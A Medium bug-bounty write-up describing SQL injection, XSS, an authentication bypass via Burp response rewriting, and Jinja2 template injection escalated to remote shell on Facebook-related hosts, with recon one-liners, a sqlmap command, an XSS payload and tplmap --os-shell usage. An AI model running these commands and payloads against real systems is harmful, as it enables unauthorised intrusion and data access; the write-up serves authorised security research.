How I Found Multiple Bugs On FaceBook In 1 Month And a Part For My Methodology & Tools

before starting
Everything was done in cooperation with HackerX007
He is a very smart and creative person. I suggest everyone to follow him [https://twitter.com/XHackerx007]

A: What The Multiple Bugs That found

B: Tools And Extensions You Need it

  • For List of domains==> amass enum -passive -norecursive -noalts -df list-domains.txt -o subs.txt
  • For Senile domain==> amass enum -passive -norecursive -noalts -d domain-o subs.txt
  • cat subs.txt | httpx -o live-subs.txt
  • cat sub.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt
  • Collaborator Everywhere
  • XSS Validator
  • Wsdler
  • .NET Beautifier
  • Bypass WAF
  • J2EEScan
  • Param Miner
  • Wayback Machine
  • JS Link Finder
  • Upload Scanner
  • Nucleus Burp Extension
  • Software Vulnerability Scanner
  • Active Scan++

C: How I Found Multiple Bugs

1 on First Domain

  • org:facebookresearch ftp
  • org:facebookresearch Ldap
  • org:facebookresearch https://
  • finely after about 30 min dorking last dork i still remmber
sqlmap -r request.txt -p username --dbms="MySQL" --force-ssl --level 5 --risk 3 --dbs --hostname
  • another SQL
  • 2 XSS payload
"><img src=x onerror=alert(1)>

Here HackerX007 He messed around a bit
as he also an artist with manual Testing Found a vary Cool Authentication Bypass

Authentication Bypass That Allow Unauthenticated User To Take ActionsWhen visit domain/location/?5 you will redirect to login pagebut on brup when visit one will redirect but the Content-Length of redirect response so big 6443After looking in the response he found out in this 302 response, the panel was without any Authentication. in the 302 response contentso 
after some playing with burp match and replace It was able to bypass Authentication and taking some actions.
at first i was think its just front-end bypass , But i found out i can take action, like enable ,un enable Bucket#Repro Steps1. IN burp match and replace add this:type: response headermatch : HTTP/1.1 302 Foundreplace: HTTP/1.1 200 ok__type: response headermatch : Location: ../login/?redirect=//location/?5replace:
2. now go to domian//location/?5
BooM
4. when you done you can [Logout] 😂

2 SHODAN IP And SSTI To RCE

git clone https://github.com/epinna/tplmap.git
./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*"
GET parameter: modeEngine: Jinja2Injection: {{*}}Context: textOS: posix-linuxTechnique: render
execution command on shell 
and
Bind and reverse shell
and
File write and read
but not in all the cases
./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*" --os-shell  

3 Privilege Escalation

https://crt.sh/?q=Facebook+Inc.
cat sub.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt
  • i also try login with some default Credentials but not working also try to sing up but the register cant be without login using admin Credentials
by check on some endpoints i found server Info with that info full name of the admin who create that
password
passwd
pwd
pass
pw
login
$host = ************
$User = ************
$pwd = ************
Full Access and Control
add users
del users
Etc...

--

--

--

Bug bounty hunter

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Managing SQL Server instances in Cloud SQL

List of commands to keep Goynaa.com running

Verifying Phone Numbers with Firebase Phone Authentication on Your Backend for FREE

How to send KSM in MathWallet

Dependency injection — keep it easy

3 Masternodes 1 VPS (Absolute ABS)

Install Oh-my-zsh & plugins in mac

Implementing Authentication using JWT, Bcrypt and GraphQL Nexus

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Orwa Atyat

Orwa Atyat

Bug bounty hunter

More from Medium

MSA Weekly 2 — NGINX (read: Engine X)Installation on Kali Linux Virtual Machine.

SQL injection UNION attack, retrieving multiple values in a single column

Utilization of OWASP Tools to protect against XSS vulnerabilities

Triggering Time Delays to Identify Blind SQL Injection Vulnerability